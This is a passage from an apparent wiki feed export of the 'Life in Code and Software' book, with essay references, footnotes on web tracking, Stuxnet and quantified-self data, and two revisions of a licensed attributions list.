Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm has the ability to transfer itself without requiring any human action. It does this by taking advantage of the file or information transport features of a computer, such as the networking setup, which allow it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, together with careful analysis of the internal data structures and the finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: the accidental capture of background images on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enrichment process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012).&lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may have been three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Compactants: computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4713</id>
		<title>Life in Code and Software/Attributions</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4713"/>
		<updated>2012-04-18T17:10:59Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Andersen, C. U. and Pold, S. (2011) 'The Scripted Spaces of Urban Ubiquitous Computing: The Experience, Poetics, and Politics of Public Scripted Space', ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2008) 'A Contribution Towards a Grammar of Code', ''Fibreculture'', issue 13: n. pag. Web. 9 Nov 2009, accessed 16/03/2012, http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) Iteracy: Reading, Writing and Running Code, accessed 15/03/2012, http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html ''(c) David M. Berry, made available here for reuse by permission of the author'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2012) ''Understanding Digital Humanities'', London: Palgrave Macmillan, accessed 15/03/2012, http://www.palgrave.com/PDFs/9780230292642.pdf ''(c) 2012 David M. Berry, Palgrave Macmillan, sample chapter available for open access'' &lt;br /&gt;
&lt;br /&gt;
Bogost, I. (2005) Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play, Telemedium, accessed 15/03/2012, http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf ''(c) 2005 Telemedium'' &lt;br /&gt;
&lt;br /&gt;
Chun, W. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16328263 ''(c) 2010 Wendy Chun'' &lt;br /&gt;
&lt;br /&gt;
Davidson, C. (2012) Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms, DML Central, accessed 15/03/2012, http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms ''(c) 2012 C. Davidson, Creative Commons Attribution 3.0 License '' &lt;br /&gt;
&lt;br /&gt;
Deleuze, G. (1992) Postscript on the Societies of Control, ''October'', vol. 59, pp 3-7, accessed 15/03/2012, http://www.n5m.org/n5m2/media/texts/deleuze.htm ''(c) 1992 October/MIT Press'' &lt;br /&gt;
&lt;br /&gt;
Dijkstra, E. W. (1998) On the cruelty of really teaching computing science, accessed 15/03/2012, http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf ''(c) 1998 Dijkstra, E. W.'' &lt;br /&gt;
&lt;br /&gt;
Gardner, M. (1970) The fantastic combinations of John Conway's new solitaire game &amp;quot;life&amp;quot;, Scientific American, 223 (October 1970): 120-123, accessed 15/03/2012, http://www.ibiblio.org/lifepatterns/october1970.html&lt;br /&gt;
''(c) 1970 Scientific American''&lt;br /&gt;
&lt;br /&gt;
Guattari, F. (1989) The Three Ecologies, ''New Formations'', no. 8, accessed 15/03/2012, http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf ''(c) New Formations'' &lt;br /&gt;
&lt;br /&gt;
Fogg, B. J., Cuellar, G., and Danielson, D. (2003) Motivating, Influencing, and Persuading Users, In Jacko, J. and Sears A. (eds.), The human-computer interaction handbook: fundamentals, evolving technologies, and emerging applications, accessed 15/03/2012, http://bjfogg.com/hci.pdf ''(c) 2003 Lawrence Erlbaum Associates'' &lt;br /&gt;
&lt;br /&gt;
Fuller, M. and Matos, S. (2011) Feral Computing: From Ubiquitous Calculation to Wild Interactions, ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16263212 ''(c) 2010 F. Frabetti'' &lt;br /&gt;
&lt;br /&gt;
Goetz, T. (2011) Harnessing the Power of Feedback Loops, Wired, accessed 12/09/2011, http://www.wired.com/magazine/2011/06/ff_feedbackloop/ ''(c) 2011 Wired'' &lt;br /&gt;
&lt;br /&gt;
Jerz, D. G. (2007) Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky, Digital Humanities Quarterly, Volume 1 Number 2, accessed 15/03/2012, http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html ''This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License'' &lt;br /&gt;
&lt;br /&gt;
Kitchin, R. (2012) The Programmable City, Environment and Planning B: Planning and Design, volume 38, pages 945-951, accessed 15/03/2012, http://www.envplan.com/epb/editorials/b3806com.pdf ''Copyright © 2012 a Pion publication, Environment and Planning B: Planning and Design'' &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2012) The Whole is Always Smaller Than Its Parts - A Digital Test of Gabriel Tarde’s Monads, ''British Journal of Sociology'', accessed 15/03/2012, http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf&lt;br /&gt;
''(c) 2012 Bruno Latour/British Journal of Sociology''&lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2006) “The Problem of Computer Code: Leviathan or Common Power?” Institute for Cultural Research, Lancaster University. 10 August 2006, accessed 15/03/2012, http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf ''(c) 2006 Adrian MacKenzie'' &lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2008) Wirelessness as Experience of Transition, Fibreculture, 13, accessed 15/03/2012, http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Manovich, L. (2008) Software Takes Command, accessed 15/03/2012, http://lab.softwarestudies.com/2008/11/softbook.html ''Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Unported License'' &lt;br /&gt;
&lt;br /&gt;
Marino, Mark C. “Critical Code Studies” Electronic Book Review. 2006. Available at http://www.electronicbookreview.com/thread/electropoetics/codology ''Creative Commons: Attribution-NonCommercial-ShareAlike 2.5 Generic (CC BY-NC-SA 2.5)'' &lt;br /&gt;
&lt;br /&gt;
McCallum, L., and Smith, D. (2012) Show Us Your Screens, accessed 04/03/2012, http://vimeo.com/20241649 ''(c) McCallum, L., and Smith, D.'' &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf ''© 2012 ESET North America. All rights reserved. Trademarks used herein are trademarks or registered trademarks of ESET spol. s r.o. or ESET North America. Freely Available White Papers'' &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2011) Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings, Fibreculture, issue 19, accessed 15/03/2012, http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Parisi, L. and Portanova, S. (2012) Soft Thought (in architecture and choreography), Computational Culture, issue 1, accessed 16/03/2012, http://computationalculture.net/article/soft-thought ''(c) 2012 Copyright the Authors, Computational Culture is an online open-access peer-reviewed journal'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2010) Algorithms are Thoughts, Chainsaws are Tools, accessed 04/03/2012, http://vimeo.com/9790850 ''(c) Stephen Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2011) On Building, accessed 15/03/2012, http://lenz.unl.edu/papers/2011/01/11/on-building.html ''(c) Stephen Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Slavin, K. (2010) How algorithms shape our world, TEDGlobal, accessed 15/03/2012, http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1936). &amp;quot;On Computable Numbers, with an Application to the Entscheidungsproblem&amp;quot;. Proceedings of the London Mathematical Society, Series 2, 42: 230–65, accessed 15/03/2012, http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf ''(c) 1937 London Mathematical Society'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1950). Computing machinery and intelligence. Mind, 59, 433-460. ''(c) 1950 Mind'' &lt;br /&gt;
&lt;br /&gt;
Weisstein, Eric W. &amp;quot;Turing Machine.&amp;quot; From MathWorld--A Wolfram Web Resource, accessed 15/03/2012, http://mathworld.wolfram.com/TuringMachine.html ''© 1999-2012 Wolfram Research, Inc.'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2006) Computational Thinking, Proceedings of the ACM, accessed 15/03/2012, http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf ''(c) Jeannette Wing'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2009) Computational Thinking and Thinking About Computing, accessed 15/03/2012, http://www.youtube.com/watch?v=C2Pq4N-iE4I ''(c) Jeannette Wing, standard Youtube license'' &lt;br /&gt;
&lt;br /&gt;
Wolf, G. (2010) The Quantified Self, TED, accessed 15/03/2012, http://www.youtube.com/watch?v=OrAo8oBBFIo ''(c) 2010 TED CONFERENCES, LLC''&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4712</id>
		<title>Life in Code and Software/Attributions</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4712"/>
		<updated>2012-04-18T16:13:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Andersen, C. U. and Pold, S. (2011) 'The Scripted Spaces of Urban Ubiquitous Computing: The Experience, Poetics, and Politics of Public Scripted Space', ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2008) 'A Contribution Towards a Grammar of Code', ''Fibreculture'', issue 13: n. pag. Web. 9 Nov 2009, accessed 16/03/2012, http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) Iteracy: Reading, Writing and Running Code, accessed 15/03/2012, http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html ''(c) David M. Berry, made available here for reuse by permission of the author'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2012) 'Understanding Digital Humanities', London: Palgrave Macmillan, accessed 15/03/2012, http://www.palgrave.com/PDFs/9780230292642.pdf ''(c) 2012 David M. Berry, Palgrave Macmillan, sample chapter available for open access'' &lt;br /&gt;
&lt;br /&gt;
Bogost, I. (2005) Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play, Telemedium, accessed 15/03/2012, http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf ''(c) 2005 Telemedium'' &lt;br /&gt;
&lt;br /&gt;
Chun, W. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16328263 ''(c) 2010 Wendy Chun'' &lt;br /&gt;
&lt;br /&gt;
Davidson, C. (2012) Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms, DML Central, accessed 15/03/2012, http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms ''(c) 2012 C. Davidson, Creative Commons Attribution 3.0 License '' &lt;br /&gt;
&lt;br /&gt;
Deleuze, G. (1992) Postscript on the Societies of Control, ''October'', vol. 59, pp 3-7, accessed 15/03/2012, http://www.n5m.org/n5m2/media/texts/deleuze.htm ''(c) 1992 October/MIT Press'' &lt;br /&gt;
&lt;br /&gt;
Dijkstra, E. W. (1998) On the cruelty of really teaching computing science, accessed 15/03/2012, http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf ''(c) 1998 Dijkstra, E. W.'' &lt;br /&gt;
&lt;br /&gt;
Gardner, M. (1970) The fantastic combinations of John Conway's new solitaire game &amp;quot;life&amp;quot;, Scientific American, 223 (October 1970): 120-123, accessed 15/03/2012, http://www.ibiblio.org/lifepatterns/october1970.html&lt;br /&gt;
''(c) 1970 Scientific American''&lt;br /&gt;
&lt;br /&gt;
Guattari, F. (1989) The Three Ecologies, new formations, no. 8, accessed 15/03/2012, http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf ''(c) New Formations'' &lt;br /&gt;
&lt;br /&gt;
Fogg, B. J., Cuellar, G., and Danielson, D. (2003) Motivating, Influencing, and Persuading Users, In Jacko, J. and Sears A. (eds.), The human-computer interaction handbook: fundamentals, evolving technologies, and emerging applications, accessed 15/03/2012, http://bjfogg.com/hci.pdf ''(c) 2003 Lawrence Erlbaum Associates'' &lt;br /&gt;
&lt;br /&gt;
Fuller, M. and Matos, S. (2011) Feral Computing: From Ubiquitous Calculation to Wild Interactions, ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16263212 ''(c) 2010 F. Frabetti'' &lt;br /&gt;
&lt;br /&gt;
Goetz, T. (2011) Harnessing the Power of Feedback Loops, Wired, accessed 12/09/2011, http://www.wired.com/magazine/2011/06/ff_feedbackloop/ ''(c) 2011 Wired'' &lt;br /&gt;
&lt;br /&gt;
Jerz, D. G. (2007) Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky, Digital Humanities Quarterly, Volume 1 Number 2, accessed 15/03/2012, http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html ''This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License'' &lt;br /&gt;
&lt;br /&gt;
Kitchin, R. (2012) The Programmable City, Environment and Planning B: Planning and Design, volume 38, pages 945-951, accessed 15/03/2012, http://www.envplan.com/epb/editorials/b3806com.pdf ''Copyright © 2012 a Pion publication, Environment and Planning B: Planning and Design'' &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2012) The Whole is Always Smaller Than Its Parts - A Digital Test of Gabriel Tarde’s Monads, ''British Journal of Sociology'', accessed 15/03/2012, http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf&lt;br /&gt;
''(c) 2012 Bruno Latour/British Journal of Sociology''&lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2006) “The Problem of Computer Code: Leviathan or Common Power?” Institute for Cultural Research, Lancaster University. 10 August 2006, accessed 15/03/2012, http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf ''(c) 2006 Adrian MacKenzie'' &lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2008) Wirelessness as Experience of Transition, Fibreculture, 13, accessed 15/03/2012, http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Manovich, L. (2008) Software Takes Command, accessed 15/03/2012, http://lab.softwarestudies.com/2008/11/softbook.html ''Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Unported License'' &lt;br /&gt;
&lt;br /&gt;
Marino, Mark C. “Critical Code Studies” Electronic Book Review. 2006. Available at http://www.electronicbookreview.com/thread/electropoetics/codology ''Creative Commons: Attribution-NonCommercial-ShareAlike 2.5 Generic (CC BY-NC-SA 2.5)'' &lt;br /&gt;
&lt;br /&gt;
McCallum, L., and Smith, D. (2012) Show Us Your Screens, accessed 04/03/2012, http://vimeo.com/20241649 ''(c) McCallum, L., and Smith, D.'' &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf ''© 2012 ESET North America. All rights reserved. Trademarks used herein are trademarks or registered trademarks of ESET spol. s r.o. or ESET North America. Freely Available White Papers'' &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2011) Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings, Fibreculture, issue 19, accessed 15/03/2012, http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Parisi, L. and Portanova, S. (2012) Soft Thought (in architecture and choreography), Computational Culture, issue 1, accessed 16/03/2012, http://computationalculture.net/article/soft-thought ''(c) 2012 Copyright the Authors, Computational Culture is an online open-access peer-reviewed journal'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2010) Algorithms are Thoughts, Chainsaws are Tools, accessed 04/03/2012, http://vimeo.com/9790850 ''(c) Stephen Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2011) On Building, accessed 15/03/2012, http://lenz.unl.edu/papers/2011/01/11/on-building.html ''(c) Stephen Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Slavin, K. (2010) How algorithms shape our world, TEDGlobal, accessed 15/03/2012, http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1936). &amp;quot;On Computable Numbers, with an Application to the Entscheidungsproblem&amp;quot;. Proceedings of the London Mathematical Society, Series 2, 42: 230–65, accessed 15/03/2012, http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf ''(c) 1937 London Mathematical Society'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1950). Computing machinery and intelligence. Mind, 59, 433-460. ''(c) 1950 Mind'' &lt;br /&gt;
&lt;br /&gt;
Weisstein, Eric W. &amp;quot;Turing Machine.&amp;quot; From MathWorld--A Wolfram Web Resource, accessed 15/03/2012, http://mathworld.wolfram.com/TuringMachine.html ''© 1999-2012 Wolfram Research, Inc.'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2006) Computational Thinking, Proceedings of the ACM, accessed 15/03/2012, http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf ''(c) Jeannette Wing'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2009) Computational Thinking and Thinking About Computing, accessed 15/03/2012, http://www.youtube.com/watch?v=C2Pq4N-iE4I ''(c) Jeannette Wing, standard Youtube license'' &lt;br /&gt;
&lt;br /&gt;
